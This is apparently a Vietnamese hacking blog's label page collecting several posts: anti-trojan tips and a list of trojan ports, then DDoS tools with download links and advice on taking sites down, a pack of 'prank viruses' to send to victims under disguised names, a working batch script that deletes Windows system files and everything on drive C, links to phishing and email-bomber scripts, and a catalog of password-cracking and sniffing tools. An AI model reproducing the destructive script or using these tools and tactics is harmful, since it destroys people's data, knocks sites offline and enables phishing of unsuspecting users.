Hiển thị các bài đăng có nhãn hackingtutorial. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn hackingtutorial. Hiển thị tất cả bài đăng

Thứ Tư, 18 tháng 11, 2015



A, Cách đơn giản nhất để chống hackers là setup  trình Antivirus..nhưng quan trọng nhất vẫn  là tính cảnh giác


1.nếu nhận được mail hoặc files của người lạ ( hoặc là mấy người bạn biềt chút it về hack ) bạn nên cẩn thận


2.  nếu 1 người nào đó rất tốt bụng...giữ cho bạn software hoặc là cái gì đó ? bạn sẽ nhận liền chứ ?
3. lúc bạn online thì nhớ bật Firewall và Antivirus nghe
4. luôn cập nhật những chương trình chống hack và Firewall

B.  Làm thế nào để biệt được mình có bị hack hay không ? 
1. cách đơn giản nhất vẫn là setup Antivirus scan xem có bị dính trojan không ? 
( nhưng nhiều khi cũng không thể nào phát hiện được chúng )
2. nhấn Ctrl + Alt + Del để xem có chương trình không bình thường nào đang chạy trên máy không ? nếu có thì nó có thể là trojan...vì thường thì khi bị nhiễm trojan thì nó sẽ tự thay đổi tên của mình khi khởi động.......
3. Vào Dos và gõ lệnh Netstat để xem coi máy bạn có mối liên kết nào với những IP không bình thường hay không ?
vd : bạn đang xem website của vietfun..sao lại chạy ra 1 IP thế này nhỉ ? 123.123.123.123 đây có thể là số IP của hacker......
4. cân đo số lượng của Upload Data và Receive Data...thông thường thì lúc bạn đang lướt web..thì Receive Date sẽ nhiều hơn Upload Data..ngược lại......nếu bạn phát hiện Upload Data ...nhiều hơn Receive data thì bạn phải cẩn thận..có thể là hacker đang lấy trộm files trên máy của bạn ( 3 ). nếu như phát hiện bị hack phải sử lý thế nào đây ?

 nếu bạn biết chính xác mình bị nhiễm bởi trojan  gì..thì có thể tiêu diệt nó dể dàng..nếu bạn khẳng định mình bị nhiễm trojan...nhưng lại không biết bị lây bởi trojan nào..hoặc không biết phải del nó bằng cách nào đây.....thế thì chỉ còn nước save lại những dữ liệu quan trọng..và Format disk thôi...

chọn Start--->Run.....gõ Regedit....sau đó trỏ đến HKEY_local_Machine -> Software -> Microsoft -> Windows -> CurrentVersion -> Run mở Folder của mục Run..coi mànhình bên Phải...coi có tồn tại 1 số lệnh khởi động trojan hay k
hông ? vd : 999.exe, xspy.exe nếu có thì del liền..... del những files không rõ nguồn gốc đó chỉ để tạm ngưng con trojan...bạn còn phải cho trình Kill virus chạy 1 lần..và diệt tân gốc files server của nó....
C. nêu phát hiện có 1 chương trình không rõ nào
đó đang hoạt động trên hệ thống..phải sử lý
thế nào ?
1. đầu tiên..bạn cần xác định vị trí cúa nó trên hệ thống...vào Start--->Search--->For files of Folder nhập vào name của chương trình...check xem nó nằm ở đâu...xem nó có phải nằm trong Folder của 1 chương trình không ? nếu không phải..b
ạn thử ngưng hoạt động của nó...coi có ảnh hưởng đến hoạt động của hệ thông không? nếu thấy hệ thống của bạn hoạt động không bình thường thì nó không phải là trojan hoặc virus gì hềt....
phần mềm cần thiết cho máy tính


2. an toàn trên hết...tốt nhất là đừng cho nó khởi  động nữa...có 2 cách để làm đựôc điều này....nhưng cách hữu hiệu nhất là vô trong Regedit để khoá nó đi...các bước làm cũng giống như trên..các bạn chỉ việc xem lại chút xíu.......

 D  Cẩn thận với các Files *.doc

1 .tuy *.doc không phải là files *.exe ...nhưng nó có thể chứa một số lệnh... khi bạn xài Wordpad hoặc là Winword để mở các files này thì Wordpad và Winword cung 4 sẽ
khởi động luôn các câu lệnh trong văn bản.vì vây...trong trường hợp đó...*.doc có thể gián tiếp trở thành files *.Exe và Wordpap hoặc Winword là người trung gian để khởi động nó..... Tuy cách này không được thịnh hành và íit người để ý đến....nhưng cũng không nên xem thường nó..nó có thể Format Disk của bạn như chơi.....( tạ
i tui thử rồi..nên biết...)

E. làm thế nào để phòng chóng người ta dùng cách Crack passwords để lấy pass của mình ?
1. quá đơn giản...khi đặt pass cho mình..bồ làm cho pass thật dài...tốt nhất là có Chữ có Số..Viết Hoa và viết Thường..không ý nghĩa gì hết vd : không lấy name của bạn..ngày tháng năm sinh..tên người yêu.....vvv nếu bạn áp dụng cách này ..password nhiều hơn 10 ký tự...hackers nào muốn Crack passmail hả ? đợi thêm 1 triệu năm nữa đi..hêêêêêêêêêê

F. các port thường dùng của trojan đây :  các port sau này là cổng mặc định của càc trojan...đôi khi bạn có thể dùng nó để biết được mình bị Ăn Đạn bởi con trojan nào....lúc đó sẽ có cách đối phó hữu hiệu
port 21 - Back Construction, Blade Runner, Doly Tro
jan, Fore, FTP trojan, Invisible FTP,
Larva,WebEx, WinCrash
port 23 - Tiny Telnet Server (= TTS)
port 25 - Ajan, Antigen, Email Password Sender, Hae
bu Coceda (= Naebi), Happy 99, Kuang2,
ProMail trojan
port 31 - Agent 31, Hackers Paradise, Masters Parad
ise
port 41 - DeepThroat
port 59 - DMSetup
port 79 - Firehotcker
port 80 - Executor, RingZero
port 99 - Hidden Port
port 110 - ProMail trojan
port 113 - Kazimas
port 119 - Happy 99
port 121 - JammerKillah
port 421 - TCP Wrappers
port 456 - Hackers Paradise
port 531 - Rasmin
port 555 - Ini-Killer, NeTAdmin, Phase Zero, Stealt
h Spy
port 666 - Attack FTP, Back Construction, Cain & Ab
el, Satanz Backdoor, ServeU, Shadow Phyre
port 911 - Dark Shadow
port 999 - DeepThroat, WinSatan
port 1001 - Silencer, WebEx
port 1010 - Doly Trojan
port 1011 - Doly Trojan
port 1012 - Doly Trojan
port 1015 - Doly Trojan
port 1024 - NetSpy
port 1042 - Bla
port 1045 - Rasmin
port 1090 - Xtreme
port 1170 - Psyber Stream Server, Streaming Audio t
rojan, Voice
port 1234 - Ultors Trojan
port 1243 - SubSeven
port 1245 - VooDoo Doll
port 1269 - Mavericks Matrix
port 1349 (UDP) - BO DLL
port 1492 - FTP99CMP
port 1509 - Psyber Streaming Server
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 1999 - TransScout
port 2000 - TransScout
port 2001 - TransScout
port 2001 - Trojan Cow
port 2002 - TransScout
port 2003 - TransScout
port 2004 - TransScout
port 2005 - TransScout
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2155 - Illusion Mailer
port 2283 - HVL Rat5
port 2565 - Striker
port 2583 - WinCrash
port 2600 - Digital RootBeer
port 2801 - Phineas Phucker
port 2989 (UDP) - RAT
port 3024 - WinCrash
port 3128 - RingZero
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3459 - Eclipse 2000
port 3700 - Portal of Doom
port 3791 - Eclypse
port 3801 (UDP) - Eclypse
port 4092 - WinCrash
port 4321 - BoBo
port 4567 - File Nail
port 4590 - ICQTrojan
port 5000 - Bubbel, Back Door Setup, Sockets de Tro
ie
port 5001 - Back Door Setup, Sockets de Troie
port 5011 - One of the Last Trojans (OOTLT)
port 5031 - NetMetro
port 5321 - Firehotcker
port 5400 - Blade Runner, Back Construction
port 5401 - Blade Runner, Back Construction
port 5402 - Blade Runner, Back Construction
port 5550 - Xtcp
port 5512 - Illusion Mailer
port 5555 - ServeMe
port 5556 - BO Facil
port 5557 - BO Facil
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6400 - The Thing
port 6669 - Vampyre
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6776 - BackDoor-G, SubSeven
port 6912 - Shit Heep (not port 69123!)
port 6939 - Indoctrination
port 6969 - GateCrasher, Priority, IRC 3
port 6970 - GateCrasher
port 7000 - Remote Grab, Kazimas
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - Back Door Setup, ICKiller
port 8080 - RingZero
port 9400 - InCommand
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9876 - Cyber Attacker
port 9878 - TransScout
port 9989 - iNi-Killer
port 10067 (UDP) - Portal of Doom
port 10101 - BrainSpy
port 10167 (UDP) - Portal of Doom
port 10520 - Acid Shivers
port 10607 - Coma
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12076 - Gjamer
port 12223 - Hack?9 KeyLogger
port 12345 - GabanBus, NetBus, Pie Bill Gates, X-bi  phan mem can thiet cho may tinh


ll
port 12346 - GabanBus, NetBus, X-bill
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 12631 - WhackJob
port 13000 - Senna Spy
port 16969 - Priority
port 17300 - Kuang2 The Virus
port 20000 - Millennium
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 20203 - Logged
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP, Whack Job
port 23476 - Donald Dick
port 23477 - Donald Dick
port 26274 (UDP) - Delta Source
port 29891 (UDP) - The Unexplained
port 30029 - AOL Trojan
port 30100 - NetSphere
port 30101 - NetSphere
port 30102 - NetSphere
port 30303 - Sockets de Troi
port 30999 - Kuang2
port 31336 - Bo Whack
port 31337 - Baron Night, BO client, BO2, Bo Facil
port 31337 (UDP) - BackFire, Back Orifice, DeepBO
port 31338 - NetSpy DK
port 31338 (UDP) - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 31785 - Hack'a'tack
port 31787 - Hack'a'tack
port 31788 - Hack'a'tack
port 31789 (UDP) - Hack'a'tack
port 31791 (UDP) - Hack'a'tack
port 31792 - Hack'a'tack
port 33333 - Prosiak
port 33911 - Spirit 2001a
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Agent 40421, Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 (UDP) - Delta Source
port 50505 - Sockets de Troie
port 50766 - Fore, Schwindler
port 53001 - Remote Windows Shutdown
port 54320 - Back Orifice 2000
port 54321 - School Bus
port 54321 (UDP) - Back Orifice 2000
port 60000 - Deep Throat
port 61466 - Telecommando
port 65000 - Devil 

phần mềm cần thiết cho máy tinh

Những kiến thức phòng chống hacker

Thứ Hai, 31 tháng 8, 2015



Link Download: http://www.mediafire.com/?yjbt9ps832enwbz

nhopc
Syn Flood


Cứ up lên VPS điền IP với port vào thì die ngay đã thử nghiệm rất tốt

Tools ddos khá mạnh Syn Flood


1.Để kết nối tới 1 web server thì web browser sẽ tương tác với DNS để lấy IP. Sau đó dùng HTTP để giao tiếp với server có địa chỉ IP mà DNS trả về.

nhopc
Webhunter 2.2
2. Việc mình làm đơn giản là tạo ra một trạm trung gian giửa máy chủ và máy con. Các gói tin sẽ được bắt lại, vì vậy khi người dùng duyệt web, quá trình bypass các firewall sẽ thực hiện một cách tình cờ bởi người dùng. Quá trình này sẽ lưu lại dữ liệu.

3. Sử dụng dữ liệu ở bước 2 truyền lên mạng khuyếch đại là các máy chủ trung gian trên internet.

4. Chương trình tạo ra hàng ngàn các tiến trình song song, đẩy server vào vòng lặp dữ liệu cho tới khi cạn kiệt tài nguyên hoặc các service không thể phục vụ tiếp.

Điễm yếu là không đánh được các server có tài nguyên dồi dào.

Download:

Webhunter 2.2 to 3.0

Aenrikk Wow DoS là Tools DDoS chạy trên Windows cực đỉnh!


Công dụng: Tự động tìm proxy để flood 1 địa chỉ đã được chỉ định (Có thể dùng để DDoS hoặc tăng traffic đến Website mình tùy thích! )
aenrik wow dos
aenrik wow dos

Nếu anh em muốn tấn công DDoS site nào thì cần phải tập trung huy động anh em cùng lúc chạy nhiều cửa sổ chương trình & tấn công đến nhiều đường dẫn chứa dữ liệu lớn của site đó, đảm bảo sẽ sập nhanh nếu site đó dùng host cùi!
Giao diện chương trình rất đơn giản & thân thiện, anh em chỉ cần nhập link cần DDoS, nhập số lượng traffic đến link này hoặc nhập thời gian cần DDoS. Nếu anh em nào có VPS Windows thì cũng có thể treo tools này, chừng vài chục cửa sổ chạy cùng lúc để qua 1 đêm bảo đảm site nào cũng sập!
Nói vậy thôi, mục đích chia sẻ & học hỏi là chính, anh em đừng dùng tools này với mục đích phá hoại nhé!
Chúc anh em thành công!
Thanks mình 1 phát nếu thấy hay!

Tool ddos Aenrikk Wow DoS

Thứ Tư, 26 tháng 8, 2015



Bộ sưu tập của mình gồm 15 con virus ( gọi là virus cho sang chứ thực ra chỉ là phần mềm đơn giản nên các bạn không sợ bị anti phát hiện ).Dưới đây là danh sách các virus :

Virus cắt mạng ( khá hay)
Virus đảo chuột ( chuột trái thành chuột phải và ngược lại )
Virus đưa ra một bảng thông báo để dọa người khác và không thể tắt đc ( thực ra vào Alt ctrl Del là OK )
Virus đổi định dạng ( cái này khá phiền vì nó sẽ đổi định dang linh tinh, vd như exe -> png )
Virus ép phím backspace liên tục gây ức chế, muốn chửi cũng không đc ( các bạn cũng có thể đổỉ thành ép phím khác )
Virus làm lag máy ( có 2 cái) khiến victim phải bỏ ra 5 - 10' để tắt hoặc raset máy luôn
Bộ 3 virus làm tắt máy, restart và log off
Virus khiến ổ đĩa cứ mở ra đóng vào liên tục cực phiền
Cuối cùng là một con virus có ích ( đây là sự khác biệt) : giúp chúng ta dọn rác trong máy
Giới thiệu đã nhiều mình xin đưa ra link luôn:
http://www.mediafire.com/download/s6q22g7950xu7zv/virus+choc+pha+nguoi+ta.rar
Để thuận tiện cho các bạn trong việc trêu chọc ( có khi là trả thù ), mình tặng thêm cho các bạn phần mềm thay đổi icon khá chuyên dụng là Iconpackager full, download tại đây( mượn link của bạn Blackgalang) . Giới thiệu sơ qua về phần mềm này cho các bạn thêm yên tâm:

Các tính năng:
* IconPackager có hàng loạt các chức năng khác nhau cho phép người dùng tùy biến icon của Windows.
* Mới: Tự động tăng đến kích cỡ cực đại trong Windows Vista.
* Mới: Đổi màu icon
* Mới: Giao diện người dùng
* Chuyển đổi tất cả các icon Windows
* Hàng ngàn gói icon để lựa chọn trên Wincustomize.com
* Sử dụng các icon lớn trên Windows XP
* Áp dụng ngẫu nhiên các gói icon khi khởi động Windows XP
* Tạo các gói icon
* Dễ dàng xem trước các icon với IconExplorer
* Tính năng tích hợp vào menu chuột phải cho phép thay đổi icon nhanh chóng và dễ dàng
* Dễ dàng lựa chọn icon

Yêu cầu hệ thống:

- Windows 2000/XP/2003/Vista
- 50MB free drive space
- 256MB RAM
- Các ngôn ngữ được hỗ trợ: Đan Mạch, Anh, Pháp, Ý, Nhật, Hàn, TBN

Một số bạn hỏi mình cách sử dụng mình xin trả lời luôn là chỉ việc tải về và send cho victim qua web,yh hay fb ( rất đơn giản đúng k ).
Lưu ý 1 chút về file lag máy, các bạn khi đổi tên file này ( để lừa mà) thì edit đổi 1.bat -> tên file mới đổi.bat .
Sau khi bạn nhoxtim nói rằng file có virus, mình đã rà soát và tìm được nguyên nhâno 2 file làm đơ chuột và bàn phím (2 file này ảnh hưởng trực tiếp đến thiết bị máy nên bị ngăn lại, mình đã xoá 2 fie này.Các ban đã tải 2 file này cũng k cần lo lắng, hãy xoá 2 file naỳ và yên tâm máy tính k sao, bác nào chưa tin có thể dùng soft kiểm dịch

Bàn phím hỏng phải dùng on-screen keyboard nên k đc nhanh, mi em sẽ post cách tắt virus theo yêu cầu của mấy bác đã thực nghiệm tại chính nhà mình

Một vài virus quẩy phá hay

@Echo Off
@cls
@title welcome to nhoit
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

Copy vào Notepad sau đó đổi tên file thành (.bat) có thể gửi cho bạn bè nếu muốn , click vào Nó sẽ xóa tất cả những gì có trong ổ C bao gồm Cookie,Windows,Sytem vv...

Hướng dẫn tạo virus phá ổ C:\\windows/


1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
2.MD4 có 3 loại:
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
3.MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
4.MSCash
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
5.SHA-1 có 2 loại:
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

Nhận dạng các loại mã hóa

Code PHP, lấy địa chỉ IP của người dùng, Get Remote IP Address in PHP, get user ip address using php


Đoạn code PHP này sẽ trả về IP đang gửi request tới server.
 <?php
function getRemoteIPAddress(){
$ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
return $ip;
}

/* If your visitor comes from proxy server you have use another function
to get a real IP address: */

function getRealIPAddress(){
if(!empty($_SERVER['HTTP_CLIENT_IP'])){
//check ip from share internet
$ip = $_SERVER['HTTP_CLIENT_IP'];
}else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
//to check ip is pass from proxy
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
?>

Code lấy ip của người dùng

Bạn có thể nhận được một email giả mạo rằng tuyên bố là từ PayPal. Gửi email giả mạo được gọi là "lừa đảo" vì người gửi là "cá" cho cá nhân của bạn


http://pastebin.com/raw.php?i=MTSv3txg

Fake Email


http://pastebin.com/raw.php?i=cSdE1MYZ

Email Bomber aka Mass Mailer

Để hiểu được các vấn đề về an toàn thông tin bạn bắt buộc phải biết sử dụng những Tools chuyên cho từng vấn đề. Trong bài viết này tôi giới thiệu với các bạn tổng hợp những Tools hay nhất cho nghiên cứu bảo mật, được chọn lọc và tổng hợp từ nhiều nguồn, phân thành từng nhóm để các bạn thuận tiện cho tra cứu. Từ tổng hợp các Tools Scan, Crack, Sniffer.. hay nhất.


Phần I: Các tools hay nhất dùng để Crack Password, Sniffer và tìm kiếm các lỗ hổng bảo mật.

Phần II. Các tools hay nhất dùng để tìm kiếm lỗ hổng trên Web, tấn công mạng Wireless, khai thác lỗ hổng bảo mật và các tools để thay đổi thông tin của gói tin

Phần I

1. 10 Tools dùng để Crack Password hay nhất.
2. 11 Tools dùng để tóm gói tin hay nhất – Packet Sniffer.
3. 10 Tools Scan các lỗ hổng bảo mật hay nhất – Vulnerability Scanner.
I. 10 Công cụ dùng để Crack Password hay nhất.

1. Cain & Abel 
– Công cụ dùng để lấy Password trên Windows hiệu quả nhất.

Trên hệ thống UNIX thường dùng các tài nguyên miễn phí còn trên nền tảng Windows thì thường không phải như vậy. Trên nền tảng Windows có nhiều Tools cho phép Crack password nhưng rất ít tools cho phép tóm các gói tin trên mạng giải mã ngược lại để lấy được Password mong muốn. Cain & Abel là một tools vừa có thể Crack Password trên windows khi ngồi tại máy tính hay có thể tóm các gói tin trên mạng và giải mã ngược lại sử dụng: Dictionary và Bruforce Attack.
Ngoài ra Cain & Abel còn nằm trong số các phần mềm Sniffer.

2. John the Ripper
Là một công cụ có tính tùy biến rất cao, hỗ trợ cho nhiều nền tảng hệ điều hành và Crack Password rất nhanh. Hỗ trợ từ môi trường UNIX, Linux, DOS, Win32,…Và là một Tools rất hiệu quả để crack những Password dễ trên hệ thống UNIX. Tools này hỗ trợ nhiều phương thức mã hóa khác nhau thường tìm thấy trên hệ thống UNIX như Kerberos AFS và phương thức mã hóa trên Windows NT/2000/XP LM hashes.

3. THC Hydra
Một tools để crack những phương thức xác thực và hỗ trợ nhiều dịch vụ khác nhau
Nếu bạn muốn tấn công sử dụng phương thức Brute Force để tấn công tới một dịch vụ “Remote Authentication Service” thì Hydra là một lựa chọn tốt nhất. Nó có thể thực hiện tấn công dựa vào Dictionary Attack, thực hiện tấn công hơn 30 giao thức khác nhau bao gồm: Telnet, ftp, http, https, smb, và một vài giao thức của cơ sở dữ liệu khác.

4. Aircrack
Một công cụ tấn bẻ khóa WEP/WPA nhanh nhất.

Aircack hỗ trợ các chuẩn không giây 802.11a/b/g và dùng để Crack WEP và WPA. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless. Ngoài ra công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack. Nó có thể hoạt động với: aircrack để crack các key mã hóa trên WEP và WPA-PSK, ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA.

5. L0phtcrack
Một tools kiểm tra các thiết lập password và crack password của Windows.

L0phtCrack, cũng hỗ trợ các phương thức mã hóa theo chuẩn LC5, khi thực hiện crack Password Windows được mã hóa khi ở trạng thái stand-alone hay đã join vào Domain, và là một công cụ để Crack password trên Active Directory. Nó cũng có khả năng sniffer trên mạng LAN. Nó có một vài phương thức để sinh ra các password để thử bằng phương thức (dictionary, brute force, etc). Ngoài tools này bạn có thể sử dụng những tools hiệu quả hơn như Cain & Abel, John the Ripper, hay Ophcack.

6. Airsnort
Một công cụ để Crack mã hóa WEP của mạng Wireless.

Airsnort là một công cụ có khả năng recovery key từ các gói tin truyền trên mạng WLAN. Được phát triển bởi Shmoo Group và được thực hiện thử độ khó và những nguy cơ tấn công vào mạng WLAN, ngoài tools này bạn có thể sử dụng tools Aircrack một công cụ hiệu quả hơn.

7. SolarWinds
Tool này cho phép scan mạng, giám sát và là một công cụ để tấn công.

SolarWinds được tạo ra với hàng tá các tác dụng. Với tính năng được giới thiệu như một công cụ để Scan và phát hiện các máy tính đang active trên mạng, là một công cụ tấn công hiệu quả giao thức SNMP bằng phương thức Brute-force attack, hay giải các mã hóa trên Router, là một công cụ hiệu quả nhất để cấu hình Router và các ứng dụng khác.

8. Pwdump.
Một công cụ recovery password trên Windows rất hiệu quả.
Pwdump cho phép extract file SAM trong Windows, hỗ trợ lấy các thông tin User, password đã được mã hóa. Ngoài tác dụng crack password mã hóa trong file SAM, nó còn có khả năng giải mã khi đặt syskey. Một lựa trọn tương tự bạn có thể sử dụng L0phtcrack cũng tương tự và hiệu quả hơn.

9. RainbowCrack.
Một tools dùng để crack password đã được mã hóa

Sử dụng có thể chiếm hết tài nguyên bộ nhớ để đánh đổi cho tính hiệu quả và giảm thiểu thời gian crack Password.

10. Brutus
Một công cụ dùng để tấn công các giao thức xác thực trên mạng.
Nó chỉ có khả năng tấn công chống lại các dịch vụ trên Windows bằng cách đoán mật khẩu đăng nhập từ các từ điển khác nhau. Chúng hỗ trợ rất nhiều giao thức nhuw: HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, và nhiều hơn nữa. Để tấn công các giao thức xác thực trên UNIX bạn có thể sử dụng THC Hydra.

Phan II
11 Tool Sniffer hay nhất.

1. Wirehark
Một chương trình tóm gói tin Sniffer Packet hay nhất.

Wireshark được biết với tên Ethereal cho đến mùa hè năm 2006, là một tool viết bằng mã nguồn mở hỗ trợ phân tích các giao thức trên Unix và Windows. Nó cho phép lấy thông tin hiệu quả từ các giao tiếp trên mạng sau đó save vào đĩa cưng. Bạn có thể có nhiều lựa chọn trong việc tóm các giao tiếp trên mạng, bạn cũng có thể phân tích nội dung của các gói tin cụ thể. Wireshark có nhiều tính năng mạnh mẽ bao gồm một chế độ lọc thông tin hiệu quả, cho phép chúng ta xem từng phiên, từng giao tiếp trên mạng. Nó cũng hỗ trợ hàng trăm giao thức khác nhau. Một trong các lý do Wireshark thay thế Ethereal đó là các lỗ hổng bảo mật của nó.

2. Kismet
Một tool rất hiệu quả để Sniffer gói tin trên mạng Wireless.

Kismet là một chương trình với giao diện command hỗ trợ giao thức 802.11 với tính năng Network Detector, Sniffer, và hoạt đông như một thiết bị giám sát IDS. Nó tự động phát hiện những gói tin thuộc các Protocol nào như TCP, UDP, ARP, và các gói tin DHCP, được ghi lại bằng Wireshark/TCPDump. Tools này còn được sử đụng để Wardriving, Warwalking, và wareflying.

3. Tcpdump
Là một tools cũ nhưng hiệu quả trong việc giám sát hệ dữ liệu trên mạng.
Tcpdump là một công cụ IP sniffers được sử dụng trước khi có Ethereal (Wireshark), và hiện nay vẫn được một số người dùng. Nó không có giao diện đồ họa đẹp và rõ ràng như Wireshark, nhưng nó hoạt động hiệu quả và không có nhiều lỗ hổng bảo mật như Ethereal. Nó cũng yêu cầu phần cứng thấp hơn và tốn ít tài nguyên hệ thống hơn. Do đó nó hỗ trợ ít tính năng hơn, nó rất hiệu quả trong xác định những yếu tố nào đang làm cho hệ thống mạng bị nghẽn, các giao tiếp thực tế chiếm băng thông trên mạng.

4. Cain & Abe
– Công cụ dùng để lấy Password trên Windows hiệu quả nhất.

Trên hệ thống UNIX thường dùng các tài nguyên miễn phí còn trên nền tảng Windows thì thường không phải như vậy. Trên nền tảng Windows có nhiều Tools cho phép Crack password nhưng rất ít tools cho phép tóm các gói tin trên mạng giải mã ngược lại để lấy được Password mong muốn. Cain & Abel là một tools vừa có thể Crack Password trên windows khi ngồi tại máy tính hay có thể tóm các gói tin trên mạng và giải mã ngược lại sử dụng: Dictionary và Bruforce Attack.
Ngoài ra Cain & Abel là một công cụ Sniffer khá hiệu quả.

5. Ettercap
Với tính năng Sniffer trên môi trương LAN Switch hiệu quả và bảo mật.

Ettercap với tính năng Network sniffer/interceptor/logger trên mạng LAN. Công cụ này cũng hỗ trợ nhiều giao thức khác nhau. Ngoài tính năng trên giao diện hợp lý và tính năng lọc kết quả cũng khá hấp dẫn. Có nhiều mức độ có thể triển khai mang lại hiệu quả cao trong quá trình Sniffering, nhiều Plugins đã hỗ trợ. Hỗ trợ LAN Switch và có khả năng OS fingerprint (đoán hệ điều hành của các máy tính online trên mạng).

6. Dsniff
Là một tool rất hiệu quả để giám sát hệ thống mạng và thực hiện penetration-testing.

Công cụ này rất phổ biến, được phát triển bởi Dug Song. Bao gồm các tính năng: dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, và giám sát truy cập web. Nó cũng rất hiệu quả để tó các gói tin chứa Password, Email, File..). với tính năng Arpspoof, dnsspoof, cho phép kết hợp với nhiều phần mềm khác để thực hiện tấn công. Có khả năng triển khai tấn công dạng Man-of-Midle. Cho phép thực hiện các phiên kết nối của https. Là một tools mà bạn cần để sniffer password trên mạng.

7. NetStumbler
Là một công cụ miễn phí trên Windows thực hiện Sniffer trên chuẩn 802.11.

Netstumbler được biết đến như một công cụ tốt nhất trên Windows để tìm kiếm những Access Points đang hoạt động. Nó cũng có phiên bản cung cấp cho WinCE cho các PDA với tên gọi là Ministumbler. Đây là một Tool hoàn toàn miễn phí nhưng Code của nó không được cung cấp miễn phí. Nó sử dụng để tìm kiếm Wireless Access Point hiệu quả hơn Kismet và KisMAC.

8. Ntop
Một công cụ sử dụng để giám sát các giao tiếp trên mạng
Ntop hiển thị các giao tiếp nào trên mạng đang chiếm nhiều băng thông nhất, những dịch vụ nào đang chiếm băng thông. Nó được thực hiện trên mạng Hosting. Trên môi trường Webnos hoạt động như Web Server, tạo ra các file html hiển thị trạng thái hiện tại của mạng.

9. Ngrep
Ngrep được cung cấp bởi GNU, được áp dụng trên lớp Network của mô hình OSI. Ngrep cho phép hiển thị thông tin Sniffer được dưới nhiều dạng như ở dạng bình thường là Hexa.Với tính năng lọc khá tốt và thường kết hợp với tcpdump và snoop.

10. EtherApe
Là một công cụ thực hiện Network Monitor có giao diện đồ hòa trên Linux. EtherApe hiển thị các hệ thống đang hoạt động bằng các màu khác nhau. Hỗ trợ nhiều mô hình mạng khác nhau như: Ethernet, FDDI, Token Ring, ISDN, PPP và SLIP. Có khả năng lọc và hiển thị các kết quả cho phép bạn dễ dàng đọc kêt quả Sniffer được.

11. KisMAC
Giao diện đồ họa để thực hiện Sniffer trên hệ điều hành Mac OS X.

Công cụ rất phổ biến cho máy Mac OS X thường là một tính năng và được đổi tên là Kismet. Không như giao diện console của Kismet, KisMAC có giao diện đồ họa dễ dàng thực hiện và lọc các kết quả Sniffer được trên môi trường đồ họa.Kết hợp với Pcap cho phép import các kết quả và vài khả năng giải mã cho phép thực hiện xác thực vào các hệ thống khác nhau.

III. 10 tools hay nhất sử dụng cho Scan các lỗ hổng bảo mật

1. Nessus
Một công cụ Scan lỗ hổng bảo mật trên UNIX hiệu quả nhất.

Nessus là một công cụ miễn phí scan lỗ hổng bảo mật hiệu quả nhất từng có, và tốt nhất là chạy trên hệ thống UNIX – (bất kỳ hệ thống nào từ rẻ tới hệ thống lớn). Tính năng tự động Update và hơn 11.000 plugin miễn phí (nhưng bạn phải đăng ký và đồng ý với EULA). Tính năng bao gồm cho phép thực hiện từ xa hay tại local, cho phép thực hiện quá trình kiểm tra bảo mật, đặc biệt hỗ trợ mô hình Client/Server với giao diện đồ họa GTK, tích hợp ngôn ngữ scripting cho phép bạn tự ghi những plugin. Nessus 3 được biết đến như một phần mềm Closed Source, nhưng vẫn có bản miễn phí và không hỗ trợ những Plugin mới nhất.

2. GFILANguard
